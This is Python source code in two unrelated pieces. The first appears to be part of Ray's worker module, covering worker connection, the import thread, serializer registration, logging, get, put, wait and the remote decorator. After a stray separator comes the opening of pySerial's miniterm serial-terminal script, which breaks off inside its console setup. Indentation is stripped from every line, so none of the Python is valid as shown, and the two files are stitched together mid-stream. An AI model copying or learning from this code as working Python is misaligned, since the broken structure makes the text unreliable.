driver_id=driver_id,
data={"name": name})
def import_thread(worker, mode):
worker.import_pubsub_client = worker.redis_client.pubsub()
# Exports that are published after the call to
# import_pubsub_client.subscribe and before the call to
# import_pubsub_client.listen will still be processed in the loop.
worker.import_pubsub_client.subscribe("__keyspace@0__:Exports")
# Keep track of the number of imports that we've imported.
num_imported = 0
# Get the exports that occurred before the call to subscribe.
with worker.lock:
export_keys = worker.redis_client.lrange("Exports", 0, -1)
for key in export_keys:
num_imported += 1
# Handle the driver case first.
if mode != WORKER_MODE:
if key.startswith(b"FunctionsToRun"):
fetch_and_execute_function_to_run(key, worker=worker)
# Continue because FunctionsToRun are the only things that the
# driver should import.
continue
if key.startswith(b"RemoteFunction"):
fetch_and_register_remote_function(key, worker=worker)
elif key.startswith(b"FunctionsToRun"):
fetch_and_execute_function_to_run(key, worker=worker)
elif key.startswith(b"ActorClass"):
# Keep track of the fact that this actor class has been
# exported so that we know it is safe to turn this worker into
# an actor of that class.
worker.imported_actor_classes.add(key)
else:
raise Exception("This code should be unreachable.")
try:
for msg in worker.import_pubsub_client.listen():
with worker.lock:
if msg["type"] == "subscribe":
continue
assert msg["data"] == b"rpush"
num_imports = worker.redis_client.llen("Exports")
assert num_imports >= num_imported
for i in range(num_imported, num_imports):
num_imported += 1
key = worker.redis_client.lindex("Exports", i)
# Handle the driver case first.
if mode != WORKER_MODE:
if key.startswith(b"FunctionsToRun"):
with log_span("ray:import_function_to_run",
worker=worker):
fetch_and_execute_function_to_run(
key, worker=worker)
# Continue because FunctionsToRun are the only things
# that the driver should import.
continue
if key.startswith(b"RemoteFunction"):
with log_span("ray:import_remote_function",
worker=worker):
fetch_and_register_remote_function(key,
worker=worker)
elif key.startswith(b"FunctionsToRun"):
with log_span("ray:import_function_to_run",
worker=worker):
fetch_and_execute_function_to_run(key,
worker=worker)
elif key.startswith(b"ActorClass"):
# Keep track of the fact that this actor class has been
# exported so that we know it is safe to turn this
# worker into an actor of that class.
worker.imported_actor_classes.add(key)
# TODO(rkn): We may need to bring back the case of fetching
# actor classes here.
else:
raise Exception("This code should be unreachable.")
except redis.ConnectionError:
# When Redis terminates the listen call will throw a ConnectionError,
# which we catch here.
pass
def connect(info, object_id_seed=None, mode=WORKER_MODE, worker=global_worker):
"""Connect this worker to the local scheduler, to Plasma, and to Redis.
Args:
info (dict): A dictionary with address of the Redis server and the
sockets of the plasma store, plasma manager, and local scheduler.
object_id_seed: A seed to use to make the generation of object IDs
deterministic.
mode: The mode of the worker. One of SCRIPT_MODE, WORKER_MODE,
PYTHON_MODE, and SILENT_MODE.
"""
check_main_thread()
# Do some basic checking to make sure we didn't call ray.init twice.
error_message = "Perhaps you called ray.init twice by accident?"
assert not worker.connected, error_message
assert worker.cached_functions_to_run is not None, error_message
assert worker.cached_remote_functions_and_actors is not None, error_message
# Initialize some fields.
worker.worker_id = random_string()
# All workers start out as non-actors. A worker can be turned into an actor
# after it is created.
worker.actor_id = NIL_ACTOR_ID
worker.connected = True
worker.set_mode(mode)
# The worker.events field is used to aggregate logging information and
# display it in the web UI. Note that Python lists protected by the GIL,
# which is important because we will append to this field from multiple
# threads.
worker.events = []
# If running Ray in PYTHON_MODE, there is no need to create call
# create_worker or to start the worker service.
if mode == PYTHON_MODE:
return
# Set the node IP address.
worker.node_ip_address = info["node_ip_address"]
worker.redis_address = info["redis_address"]
# Create a Redis client.
redis_ip_address, redis_port = info["redis_address"].split(":")
worker.redis_client = redis.StrictRedis(host=redis_ip_address,
port=int(redis_port))
# For driver's check that the version information matches the version
# information that the Ray cluster was started with.
try:
ray.services.check_version_info(worker.redis_client)
except Exception as e:
if mode in [SCRIPT_MODE, SILENT_MODE]:
raise e
elif mode == WORKER_MODE:
traceback_str = traceback.format_exc()
ray.utils.push_error_to_driver(worker.redis_client,
"version_mismatch",
traceback_str,
driver_id=None)
worker.lock = threading.Lock()
# Check the RedirectOutput key in Redis and based on its value redirect
# worker output and error to their own files.
if mode == WORKER_MODE:
# This key is set in services.py when Redis is started.
redirect_worker_output_val = worker.redis_client.get("RedirectOutput")
if (redirect_worker_output_val is not None and
int(redirect_worker_output_val) == 1):
redirect_worker_output = 1
else:
redirect_worker_output = 0
if redirect_worker_output:
log_stdout_file, log_stderr_file = services.new_log_files("worker",
True)
sys.stdout = log_stdout_file
sys.stderr = log_stderr_file
services.record_log_files_in_redis(info["redis_address"],
info["node_ip_address"],
[log_stdout_file,
log_stderr_file])
# Create an object for interfacing with the global state.
global_state._initialize_global_state(redis_ip_address, int(redis_port))
# Register the worker with Redis.
if mode in [SCRIPT_MODE, SILENT_MODE]:
# The concept of a driver is the same as the concept of a "job".
# Register the driver/job with Redis here.
import __main__ as main
driver_info = {
"node_ip_address": worker.node_ip_address,
"driver_id": worker.worker_id,
"start_time": time.time(),
"plasma_store_socket": info["store_socket_name"],
"plasma_manager_socket": info["manager_socket_name"],
"local_scheduler_socket": info["local_scheduler_socket_name"]}
driver_info["name"] = (main.__file__ if hasattr(main, "__file__")
else "INTERACTIVE MODE")
worker.redis_client.hmset(b"Drivers:" + worker.worker_id, driver_info)
if not worker.redis_client.exists("webui"):
worker.redis_client.hmset("webui", {"url": info["webui_url"]})
is_worker = False
elif mode == WORKER_MODE:
# Register the worker with Redis.
worker_dict = {
"node_ip_address": worker.node_ip_address,
"plasma_store_socket": info["store_socket_name"],
"plasma_manager_socket": info["manager_socket_name"],
"local_scheduler_socket": info["local_scheduler_socket_name"]}
if redirect_worker_output:
worker_dict["stdout_file"] = os.path.abspath(log_stdout_file.name)
worker_dict["stderr_file"] = os.path.abspath(log_stderr_file.name)
worker.redis_client.hmset(b"Workers:" + worker.worker_id, worker_dict)
is_worker = True
else:
raise Exception("This code should be unreachable.")
# Create an object store client.
worker.plasma_client = plasma.connect(info["store_socket_name"],
info["manager_socket_name"],
64)
worker.local_scheduler_client = ray.local_scheduler.LocalSchedulerClient(
info["local_scheduler_socket_name"], worker.worker_id, is_worker)
# If this is a driver, set the current task ID, the task driver ID, and set
# the task index to 0.
if mode in [SCRIPT_MODE, SILENT_MODE]:
# If the user provided an object_id_seed, then set the current task ID
# deterministically based on that seed (without altering the state of
# the user's random number generator). Otherwise, set the current task
# ID randomly to avoid object ID collisions.
numpy_state = np.random.get_state()
if object_id_seed is not None:
np.random.seed(object_id_seed)
else:
# Try to use true randomness.
np.random.seed(None)
worker.current_task_id = ray.local_scheduler.ObjectID(
np.random.bytes(20))
# When tasks are executed on remote workers in the context of multiple
# drivers, the task driver ID is used to keep track of which driver is
# responsible for the task so that error messages will be propagated to
# the correct driver.
worker.task_driver_id = ray.local_scheduler.ObjectID(worker.worker_id)
# Reset the state of the numpy random number generator.
np.random.set_state(numpy_state)
# Set other fields needed for computing task IDs.
worker.task_index = 0
worker.put_index = 0
# Create an entry for the driver task in the task table. This task is
# added immediately with status RUNNING. This allows us to push errors
# related to this driver task back to the driver. For example, if the
# driver creates an object that is later evicted, we should notify the
# user that we're unable to reconstruct the object, since we cannot
# rerun the driver.
nil_actor_counter = 0
driver_task = ray.local_scheduler.Task(
worker.task_driver_id,
ray.local_scheduler.ObjectID(NIL_FUNCTION_ID),
[],
0,
worker.current_task_id,
worker.task_index,
ray.local_scheduler.ObjectID(NIL_ACTOR_ID),
ray.local_scheduler.ObjectID(NIL_ACTOR_ID),
ray.local_scheduler.ObjectID(NIL_ACTOR_ID),
ray.local_scheduler.ObjectID(NIL_ACTOR_ID),
nil_actor_counter,
False,
[],
{"CPU": 0})
global_state._execute_command(
driver_task.task_id(),
"RAY.TASK_TABLE_ADD",
driver_task.task_id().id(),
TASK_STATUS_RUNNING,
NIL_LOCAL_SCHEDULER_ID,
driver_task.execution_dependencies_string(),
0,
ray.local_scheduler.task_to_string(driver_task))
# Set the driver's current task ID to the task ID assigned to the
# driver task.
worker.current_task_id = driver_task.task_id()
# Initialize the serialization library. This registers some classes, and so
# it must be run before we export all of the cached remote functions.
_initialize_serialization()
# Start a thread to import exports from the driver or from other workers.
# Note that the driver also has an import thread, which is used only to
# import custom class definitions from calls to register_custom_serializer
# that happen under the hood on workers.
t = threading.Thread(target=import_thread, args=(worker, mode))
# Making the thread a daemon causes it to exit when the main thread exits.
t.daemon = True
t.start()
# If this is a driver running in SCRIPT_MODE, start a thread to print error
# messages asynchronously in the background. Ideally the scheduler would
# push messages to the driver's worker service, but we ran into bugs when
# trying to properly shutdown the driver's worker service, so we are
# temporarily using this implementation which constantly queries the
# scheduler for new error messages.
if mode == SCRIPT_MODE:
t = threading.Thread(target=print_error_messages, args=(worker,))
# Making the thread a daemon causes it to exit when the main thread
# exits.
t.daemon = True
t.start()
if mode in [SCRIPT_MODE, SILENT_MODE]:
# Add the directory containing the script that is running to the Python
# paths of the workers. Also add the current directory. Note that this
# assumes that the directory structures on the machines in the clusters
# are the same.
script_directory = os.path.abspath(os.path.dirname(sys.argv[0]))
current_directory = os.path.abspath(os.path.curdir)
worker.run_function_on_all_workers(
lambda worker_info: sys.path.insert(1, script_directory))
worker.run_function_on_all_workers(
lambda worker_info: sys.path.insert(1, current_directory))
# TODO(rkn): Here we first export functions to run, then remote
# functions. The order matters. For example, one of the functions to
# run may set the Python path, which is needed to import a module used
# to define a remote function. We may want to change the order to
# simply be the order in which the exports were defined on the driver.
# In addition, we will need to retain the ability to decide what the
# first few exports are (mostly to set the Python path). Additionally,
# note that the first exports to be defined on the driver will be the
# ones defined in separate modules that are imported by the driver.
# Export cached functions_to_run.
for function in worker.cached_functions_to_run:
worker.run_function_on_all_workers(function)
# Export cached remote functions to the workers.
for cached_type, info in worker.cached_remote_functions_and_actors:
if cached_type == "remote_function":
(function_id, func_name, func,
func_invoker, function_properties) = info
export_remote_function(function_id, func_name, func,
func_invoker, function_properties,
worker)
elif cached_type == "actor":
(key, actor_class_info) = info
ray.actor.publish_actor_class_to_key(key, actor_class_info,
worker)
else:
assert False, "This code should be unreachable."
worker.cached_functions_to_run = None
worker.cached_remote_functions_and_actors = None
def disconnect(worker=global_worker):
"""Disconnect this worker from the scheduler and object store."""
# Reset the list of cached remote functions and actors so that if more
# remote functions or actors are defined and then connect is called again,
# the remote functions will be exported. This is mostly relevant for the
# tests.
worker.connected = False
worker.cached_functions_to_run = []
worker.cached_remote_functions_and_actors = []
worker.serialization_context = pyarrow.SerializationContext()
def _try_to_compute_deterministic_class_id(cls, depth=5):
"""Attempt to produce a deterministic class ID for a given class.
The goal here is for the class ID to be the same when this is run on
different worker processes. Pickling, loading, and pickling again seems to
produce more consistent results than simply pickling. This is a bit crazy
and could cause problems, in which case we should revert it and figure out
something better.
Args:
cls: The class to produce an ID for.
depth: The number of times to repeatedly try to load and dump the
string while trying to reach a fixed point.
Returns:
A class ID for this class. We attempt to make the class ID the same
when this function is run on different workers, but that is not
guaranteed.
Raises:
Exception: This could raise an exception if cloudpickle raises an
exception.
"""
# Pickling, loading, and pickling again seems to produce more consistent
# results than simply pickling. This is a bit
class_id = pickle.dumps(cls)
for _ in range(depth):
new_class_id = pickle.dumps(pickle.loads(class_id))
if new_class_id == class_id:
# We appear to have reached a fix point, so use this as the ID.
return hashlib.sha1(new_class_id).digest()
class_id = new_class_id
# We have not reached a fixed point, so we may end up with a different
# class ID for this custom class on each worker, which could lead to the
# same class definition being exported many many times.
print("WARNING: Could not produce a deterministic class ID for class "
"{}".format(cls), file=sys.stderr)
return hashlib.sha1(new_class_id).digest()
def register_custom_serializer(cls, use_pickle=False, use_dict=False,
serializer=None, deserializer=None,
local=False, worker=global_worker):
"""Enable serialization and deserialization for a particular class.
This method runs the register_class function defined below on every worker,
which will enable ray to properly serialize and deserialize objects of
this class.
Args:
cls (type): The class that ray should serialize.
use_pickle (bool): If true, then objects of this class will be
serialized using pickle.
use_dict: If true, then objects of this class be serialized turning
their __dict__ fields into a dictionary. Must be False if
use_pickle is true.
serializer: The custom serializer to use. This should be provided if
and only if use_pickle and use_dict are False.
deserializer: The custom deserializer to use. This should be provided
if and only if use_pickle and use_dict are False.
local: True if the serializers should only be registered on the current
worker. This should usually be False.
Raises:
Exception: An exception is raised if pickle=False and the class cannot
be efficiently serialized by Ray. This can also raise an exception
if use_dict is true and cls is not pickleable.
"""
assert (serializer is None) == (deserializer is None), (
"The serializer/deserializer arguments must both be provided or "
"both not be provided."
)
use_custom_serializer = (serializer is not None)
assert use_custom_serializer + use_pickle + use_dict == 1, (
"Exactly one of use_pickle, use_dict, or serializer/deserializer must "
"be specified."
)
if use_dict:
# Raise an exception if cls cannot be serialized efficiently by Ray.
serialization.check_serializable(cls)
if not local:
# In this case, the class ID will be used to deduplicate the class
# across workers. Note that cloudpickle unfortunately does not produce
# deterministic strings, so these IDs could be different on different
# workers. We could use something weaker like cls.__name__, however
# that would run the risk of having collisions. TODO(rkn): We should
# improve this.
try:
# Attempt to produce a class ID that will be the same on each
# worker. However, determinism is not guaranteed, and the result
# may be different on different workers.
class_id = _try_to_compute_deterministic_class_id(cls)
except Exception as e:
raise serialization.CloudPickleError("Failed to pickle class "
"'{}'".format(cls))
else:
# In this case, the class ID only needs to be meaningful on this worker
# and not across workers.
class_id = random_string()
def register_class_for_serialization(worker_info):
# TODO(rkn): We need to be more thoughtful about what to do if custom
# serializers have already been registered for class_id. In some cases,
# we may want to use the last user-defined serializers and ignore
# subsequent calls to register_custom_serializer that were made by the
# system.
worker_info["worker"].serialization_context.register_type(
cls, class_id, pickle=use_pickle, custom_serializer=serializer,
custom_deserializer=deserializer)
if not local:
worker.run_function_on_all_workers(register_class_for_serialization)
else:
# Since we are pickling objects of this class, we don't actually need
# to ship the class definition.
register_class_for_serialization({"worker": worker})
class RayLogSpan(object):
"""An object used to enable logging a span of events with a with statement.
Attributes:
event_type (str): The type of the event being logged.
contents: Additional information to log.
"""
def __init__(self, event_type, contents=None, worker=global_worker):
"""Initialize a RayLogSpan object."""
self.event_type = event_type
self.contents = contents
self.worker = worker
def __enter__(self):
"""Log the beginning of a span event."""
log(event_type=self.event_type,
contents=self.contents,
kind=LOG_SPAN_START,
worker=self.worker)
def __exit__(self, type, value, tb):
"""Log the end of a span event. Log any exception that occurred."""
if type is None:
log(event_type=self.event_type, kind=LOG_SPAN_END,
worker=self.worker)
else:
log(event_type=self.event_type,
contents={"type": str(type),
"value": value,
"traceback": traceback.format_exc()},
kind=LOG_SPAN_END,
worker=self.worker)
def log_span(event_type, contents=None, worker=global_worker):
return RayLogSpan(event_type, contents=contents, worker=worker)
def log_event(event_type, contents=None, worker=global_worker):
log(event_type, kind=LOG_POINT, contents=contents, worker=worker)
def log(event_type, kind, contents=None, worker=global_worker):
"""Log an event to the global state store.
This adds the event to a buffer of events locally. The buffer can be
flushed and written to the global state store by calling flush_log().
Args:
event_type (str): The type of the event.
contents: More general data to store with the event.
kind (int): Either LOG_POINT, LOG_SPAN_START, or LOG_SPAN_END. This is
LOG_POINT if the event being logged happens at a single point in
time. It is LOG_SPAN_START if we are starting to log a span of
time, and it is LOG_SPAN_END if we are finishing logging a span of
time.
"""
# TODO(rkn): This code currently takes around half a microsecond. Since we
# call it tens of times per task, this adds up. We will need to redo the
# logging code, perhaps in C.
contents = {} if contents is None else contents
assert isinstance(contents, dict)
# Make sure all of the keys and values in the dictionary are strings.
contents = {str(k): str(v) for k, v in contents.items()}
# Log the event if this is a worker and not a driver, since the driver's
# event log never gets flushed.
if worker.mode == WORKER_MODE:
worker.events.append((time.time(), event_type, kind, contents))
def flush_log(worker=global_worker):
"""Send the logged worker events to the global state store."""
event_log_key = b"event_log:" + worker.worker_id
event_log_value = json.dumps(worker.events)
worker.local_scheduler_client.log_event(event_log_key,
event_log_value,
time.time())
worker.events = []
def get(object_ids, worker=global_worker):
"""Get a remote object or a list of remote objects from the object store.
This method blocks until the object corresponding to the object ID is
available in the local object store. If this object is not in the local
object store, it will be shipped from an object store that has it (once the
object has been created). If object_ids is a list, then the objects
corresponding to each object in the list will be returned.
Args:
object_ids: Object ID of the object to get or a list of object IDs to
get.
Returns:
A Python object or a list of Python objects.
"""
check_connected(worker)
with log_span("ray:get", worker=worker):
check_main_thread()
if worker.mode == PYTHON_MODE:
# In PYTHON_MODE, ray.get is the identity operation (the input will
# actually be a value not an objectid).
return object_ids
if isinstance(object_ids, list):
values = worker.get_object(object_ids)
for i, value in enumerate(values):
if isinstance(value, RayTaskError):
raise RayGetError(object_ids[i], value)
return values
else:
value = worker.get_object([object_ids])[0]
if isinstance(value, RayTaskError):
# If the result is a RayTaskError, then the task that created
# this object failed, and we should propagate the error message
# here.
raise RayGetError(object_ids, value)
return value
def put(value, worker=global_worker):
"""Store an object in the object store.
Args:
value: The Python object to be stored.
Returns:
The object ID assigned to this value.
"""
check_connected(worker)
with log_span("ray:put", worker=worker):
check_main_thread()
if worker.mode == PYTHON_MODE:
# In PYTHON_MODE, ray.put is the identity operation.
return value
object_id = worker.local_scheduler_client.compute_put_id(
worker.current_task_id, worker.put_index)
worker.put_object(object_id, value)
worker.put_index += 1
return object_id
def wait(object_ids, num_returns=1, timeout=None, worker=global_worker):
"""Return a list of IDs that are ready and a list of IDs that are not.
If timeout is set, the function returns either when the requested number of
IDs are ready or when the timeout is reached, whichever occurs first. If it
is not set, the function simply waits until that number of objects is ready
and returns that exact number of object_ids.
This method returns two lists. The first list consists of object IDs that
correspond to objects that are stored in the object store. The second list
corresponds to the rest of the object IDs (which may or may not be ready).
Args:
object_ids (List[ObjectID]): List of object IDs for objects that may or
may not be ready. Note that these IDs must be unique.
num_returns (int): The number of object IDs that should be returned.
timeout (int): The maximum amount of time in milliseconds to wait
before returning.
Returns:
A list of object IDs that are ready and a list of the remaining object
IDs.
"""
if isinstance(object_ids, ray.local_scheduler.ObjectID):
raise TypeError(
"wait() expected a list of ObjectID, got a single ObjectID")
if not isinstance(object_ids, list):
raise TypeError("wait() expected a list of ObjectID, got {}".format(
type(object_ids)))
if worker.mode != PYTHON_MODE:
for object_id in object_ids:
if not isinstance(object_id, ray.local_scheduler.ObjectID):
raise TypeError(
"wait() expected a list of ObjectID, "
"got list containing {}".format(type(object_id)))
check_connected(worker)
with log_span("ray:wait", worker=worker):
check_main_thread()
# When Ray is run in PYTHON_MODE, all functions are run immediately,
# so all objects in object_id are ready.
if worker.mode == PYTHON_MODE:
return object_ids[:num_returns], object_ids[num_returns:]
# TODO(rkn): This is a temporary workaround for
# https://github.com/ray-project/ray/issues/997. However, it should be
# fixed in Arrow instead of here.
if len(object_ids) == 0:
return [], []
object_id_strs = [plasma.ObjectID(object_id.id())
for object_id in object_ids]
timeout = timeout if timeout is not None else 2 ** 30
ready_ids, remaining_ids = worker.plasma_client.wait(object_id_strs,
timeout,
num_returns)
ready_ids = [ray.local_scheduler.ObjectID(object_id.binary())
for object_id in ready_ids]
remaining_ids = [ray.local_scheduler.ObjectID(object_id.binary())
for object_id in remaining_ids]
return ready_ids, remaining_ids
def _submit_task(function_id, *args, **kwargs):
"""This is a wrapper around worker.submit_task.
We use this wrapper so that in the remote decorator, we can call
_submit_task instead of worker.submit_task. The difference is that when we
attempt to serialize remote functions, we don't attempt to serialize the
worker object, which cannot be serialized.
"""
return global_worker.submit_task(function_id, *args, **kwargs)
def _mode(worker=global_worker):
"""This is a wrapper around worker.mode.
We use this wrapper so that in the remote decorator, we can call _mode()
instead of worker.mode. The difference is that when we attempt to serialize
remote functions, we don't attempt to serialize the worker object, which
cannot be serialized.
"""
return worker.mode
def export_remote_function(function_id, func_name, func, func_invoker,
function_properties, worker=global_worker):
check_main_thread()
if _mode(worker) not in [SCRIPT_MODE, SILENT_MODE]:
raise Exception("export_remote_function can only be called on a "
"driver.")
worker.function_properties[
worker.task_driver_id.id()][function_id.id()] = function_properties
task_driver_id = worker.task_driver_id
key = b"RemoteFunction:" + task_driver_id.id() + b":" + function_id.id()
# Work around limitations of Python pickling.
func_name_global_valid = func.__name__ in func.__globals__
func_name_global_value = func.__globals__.get(func.__name__)
# Allow the function to reference itself as a global variable
if not is_cython(func):
func.__globals__[func.__name__] = func_invoker
try:
pickled_func = pickle.dumps(func)
finally:
# Undo our changes
if func_name_global_valid:
func.__globals__[func.__name__] = func_name_global_value
else:
del func.__globals__[func.__name__]
worker.redis_client.hmset(key, {
"driver_id": worker.task_driver_id.id(),
"function_id": function_id.id(),
"name": func_name,
"module": func.__module__,
"function": pickled_func,
"num_return_vals": function_properties.num_return_vals,
"resources": json.dumps(function_properties.resources),
"max_calls": function_properties.max_calls})
worker.redis_client.rpush("Exports", key)
def in_ipython():
"""Return true if we are in an IPython interpreter and false otherwise."""
try:
__IPYTHON__
return True
except NameError:
return False
def compute_function_id(func_name, func):
"""Compute an function ID for a function.
Args:
func_name: The name of the function (this includes the module name plus
the function name).
func: The actual function.
Returns:
This returns the function ID.
"""
function_id_hash = hashlib.sha1()
# Include the function name in the hash.
function_id_hash.update(func_name.encode("ascii"))
# If we are running a script or are in IPython, include the source code in
# the hash. If we are in a regular Python interpreter we skip this part
# because the source code is not accessible. If the function is a built-in
# (e.g., Cython), the source code is not accessible.
import __main__ as main
if (hasattr(main, "__file__") or in_ipython()) \
and inspect.isfunction(func):
function_id_hash.update(inspect.getsource(func).encode("ascii"))
# Compute the function ID.
function_id = function_id_hash.digest()
assert len(function_id) == 20
function_id = FunctionID(function_id)
return function_id
def remote(*args, **kwargs):
"""This decorator is used to define remote functions and to define actors.
Args:
num_return_vals (int): The number of object IDs that a call to this
function should return.
num_cpus (int): The number of CPUs needed to execute this function.
num_gpus (int): The number of GPUs needed to execute this function.
resources: A dictionary mapping resource name to the required quantity
of that resource.
max_calls (int): The maximum number of tasks of this kind that can be
run on a worker before the worker needs to be restarted.
checkpoint_interval (int): The number of tasks to run between
checkpoints of the actor state.
"""
worker = global_worker
def make_remote_decorator(num_return_vals, num_cpus, num_gpus, resources,
max_calls, checkpoint_interval, func_id=None):
def remote_decorator(func_or_class):
if inspect.isfunction(func_or_class) or is_cython(func_or_class):
# Set the remote function default resources.
resources["CPU"] = (DEFAULT_REMOTE_FUNCTION_CPUS
if num_cpus is None else num_cpus)
resources["GPU"] = (DEFAULT_REMOTE_FUNCTION_GPUS
if num_gpus is None else num_gpus)
function_properties = FunctionProperties(
num_return_vals=num_return_vals,
resources=resources,
max_calls=max_calls)
return remote_function_decorator(func_or_class,
function_properties)
if inspect.isclass(func_or_class):
# Set the actor default resources.
if num_cpus is None and num_gpus is None and resources == {}:
# In the default case, actors acquire no resources for
# their lifetime, and actor methods will require 1 CPU.
resources["CPU"] = DEFAULT_ACTOR_CREATION_CPUS_SIMPLE_CASE
actor_method_cpus = DEFAULT_ACTOR_METHOD_CPUS_SIMPLE_CASE
else:
# If any resources are specified, then all resources are
# acquired for the actor's lifetime and no resources are
# associated with methods.
resources["CPU"] = (
DEFAULT_ACTOR_CREATION_CPUS_SPECIFIED_CASE
if num_cpus is None else num_cpus)
resources["GPU"] = (
DEFAULT_ACTOR_CREATION_GPUS_SPECIFIED_CASE
if num_gpus is None else num_gpus)
actor_method_cpus = (
DEFAULT_ACTOR_METHOD_CPUS_SPECIFIED_CASE)
return worker.make_actor(func_or_class, resources,
checkpoint_interval,
actor_method_cpus)
raise Exception("The @ray.remote decorator must be applied to "
"either a function or to a class.")
def remote_function_decorator(func, function_properties):
func_name = "{}.{}".format(func.__module__, func.__name__)
if func_id is None:
function_id = compute_function_id(func_name, func)
else:
function_id = func_id
def func_call(*args, **kwargs):
"""This runs immediately when a remote function is called."""
return _submit(args=args, kwargs=kwargs)
def _submit(args=None, kwargs=None, num_return_vals=None,
num_cpus=None, num_gpus=None, resources=None):
"""An experimental alternate way to submit remote functions."""
check_connected()
check_main_thread()
kwargs = {} if kwargs is None else kwargs
args = signature.extend_args(function_signature, args, kwargs)
if _mode() == PYTHON_MODE:
# In PYTHON_MODE, remote calls simply execute the function.
# We copy the arguments to prevent the function call from
# mutating them and to match the usual behavior of
# immutable remote objects.
result = func(*copy.deepcopy(args))
return result
object_ids = _submit_task(function_id, args,
num_return_vals=num_return_vals,
num_cpus=num_cpus, num_gpus=num_gpus,
resources=resources)
if len(object_ids) == 1:
return object_ids[0]
elif len(object_ids) > 1:
return object_ids
def func_executor(arguments):
"""This gets run when the remote function is executed."""
result = func(*arguments)
return result
def func_invoker(*args, **kwargs):
"""This is used to invoke the function."""
raise Exception("Remote functions cannot be called directly. "
"Instead of running '{}()', try '{}.remote()'."
.format(func_name, func_name))
func_invoker.remote = func_call
func_invoker._submit = _submit
func_invoker.executor = func_executor
func_invoker.is_remote = True
func_name = "{}.{}".format(func.__module__, func.__name__)
func_invoker.func_name = func_name
if sys.version_info >= (3, 0) or is_cython(func):
func_invoker.__doc__ = func.__doc__
else:
func_invoker.func_doc = func.func_doc
signature.check_signature_supported(func)
function_signature = signature.extract_signature(func)
# Everything ready - export the function
if worker.mode in [SCRIPT_MODE, SILENT_MODE]:
export_remote_function(function_id, func_name, func,
func_invoker, function_properties)
elif worker.mode is None:
worker.cached_remote_functions_and_actors.append(
("remote_function", (function_id, func_name, func,
func_invoker, function_properties)))
return func_invoker
return remote_decorator
# Handle resource arguments
num_cpus = kwargs["num_cpus"] if "num_cpus" in kwargs else None
num_gpus = kwargs["num_gpus"] if "num_gpus" in kwargs else None
resources = kwargs.get("resources", {})
if not isinstance(resources, dict):
raise Exception("The 'resources' keyword argument must be a "
"dictionary, but received type {}."
.format(type(resources)))
assert "CPU" not in resources, "Use the 'num_cpus' argument."
assert "GPU" not in resources, "Use the 'num_gpus' argument."
# Handle other arguments.
num_return_vals = (kwargs["num_return_vals"] if "num_return_vals"
in kwargs else 1)
max_calls = kwargs["max_calls"] if "max_calls" in kwargs else 0
checkpoint_interval = (kwargs["checkpoint_interval"]
if "checkpoint_interval" in kwargs else -1)
if _mode() == WORKER_MODE:
if "function_id" in kwargs:
function_id = kwargs["function_id"]
return make_remote_decorator(num_return_vals, num_cpus, num_gpus,
resources, max_calls,
checkpoint_interval, function_id)
if len(args) == 1 and len(kwargs) == 0 and callable(args[0]):
# This is the case where the decorator is just @ray.remote.
return make_remote_decorator(
num_return_vals, num_cpus, num_gpus, resources,
max_calls, checkpoint_interval)(args[0])
else:
# This is the case where the decorator is something like
# @ray.remote(num_return_vals=2).
error_string = ("The @ray.remote decorator must be applied either "
"with no arguments and no parentheses, for example "
"'@ray.remote', or it must be applied using some of "
"the arguments 'num_return_vals', 'resources', "
"or 'max_calls', like "
"'@ray.remote(num_return_vals=2, "
"resources={\"GPU\": 1})'.")
assert len(args) == 0 and len(kwargs) > 0, error_string
for key in kwargs:
assert key in ["num_return_vals", "num_cpus", "num_gpus",
"resources", "max_calls",
"checkpoint_interval"], error_string
assert "function_id" not in kwargs
return make_remote_decorator(num_return_vals, num_cpus, num_gpus,
resources, max_calls, checkpoint_interval)
|
miniterm.py | #!/usr/bin/env python
# Very simple serial terminal
# (C)2002-2011 Chris Liechti <cliechti@gmx.net>
# Input characters are sent directly (only LF -> CR/LF/CRLF translation is
# done), received characters are displayed as is (or escaped trough pythons
# repr, useful for debug purposes)
import sys, os, serial, threading
try:
from serial.tools.list_ports import comports
except ImportError:
comports = None
EXITCHARCTER = serial.to_bytes([0x1d]) # GS/CTRL+]
MENUCHARACTER = serial.to_bytes([0x14]) # Menu: CTRL+T
DEFAULT_PORT = None
DEFAULT_BAUDRATE = 9600
DEFAULT_RTS = None
DEFAULT_DTR = None
def key_description(character):
"""generate a readable description for a key"""
ascii_code = ord(character)
if ascii_code < 32:
return 'Ctrl+%c' % (ord('@') + ascii_code)
else:
return repr(character)
# help text, starts with blank line! it's a function so that the current values
# for the shortcut keys is used and not the value at program start
def get_help_text():
return """
--- pySerial (%(version)s) - miniterm - help
---
--- %(exit)-8s Exit program
--- %(menu)-8s Menu escape key, followed by:
--- Menu keys:
--- %(itself)-7s Send the menu character itself to remote
--- %(exchar)-7s Send the exit character itself to remote
--- %(info)-7s Show info
--- %(upload)-7s Upload file (prompt will be shown)
--- Toggles:
--- %(rts)-7s RTS %(echo)-7s local echo
--- %(dtr)-7s DTR %(break)-7s BREAK
--- %(lfm)-7s line feed %(repr)-7s Cycle repr mode
---
--- Port settings (%(menu)s followed by the following):
--- p change port
--- 7 8 set data bits
--- n e o s m change parity (None, Even, Odd, Space, Mark)
--- 1 2 3 set stop bits (1, 2, 1.5)
--- b change baud rate
--- x X disable/enable software flow control
--- r R disable/enable hardware flow control
""" % {
'version': getattr(serial, 'VERSION', 'unknown version'),
'exit': key_description(EXITCHARCTER),
'menu': key_description(MENUCHARACTER),
'rts': key_description('\x12'),
'repr': key_description('\x01'),
'dtr': key_description('\x04'),
'lfm': key_description('\x0c'),
'break': key_description('\x02'),
'echo': key_description('\x05'),
'info': key_description('\x09'),
'upload': key_description('\x15'),
'itself': key_description(MENUCHARACTER),
'exchar': key_description(EXITCHARCTER),
}
if sys.version_info >= (3, 0):
def character(b):
return b.decode('latin1')
else:
def character(b):
return b
LF = serial.to_bytes([10])
CR = serial.to_bytes([13])
CRLF = serial.to_bytes([13, 10])
X00 = serial.to_bytes([0])
X0E = serial.to_bytes([0x0e])
# first choose a platform dependant way to read single characters from the console
global console
if os.name == 'nt':
import msvcrt
class Console(object):
def __init__(self):
pass
def setup(self):
pass # Do nothing for 'nt'
def cleanup(self):
pass # Do nothing for 'nt'
def getkey(self):
while True:
z = msvcrt.getch()
if z == X00 or z == X0E: # functions keys, ignore
msvcrt.getch()
else:
if z == CR:
return LF
return z
console = Console()
elif os.name == 'posix':
import termios, sys, os
class Console(object):
def __init__(self):
self.fd = sys.stdin.fileno()
self.old = None
def setup(self):
self.old = termios.tcgetattr(self.fd)
new = termios.tcgetattr(self.fd)
new[3] = new[3] & ~termios.ICANON & ~termios.ECHO & ~termios.ISIG
new[6][termios.VMIN] = 1
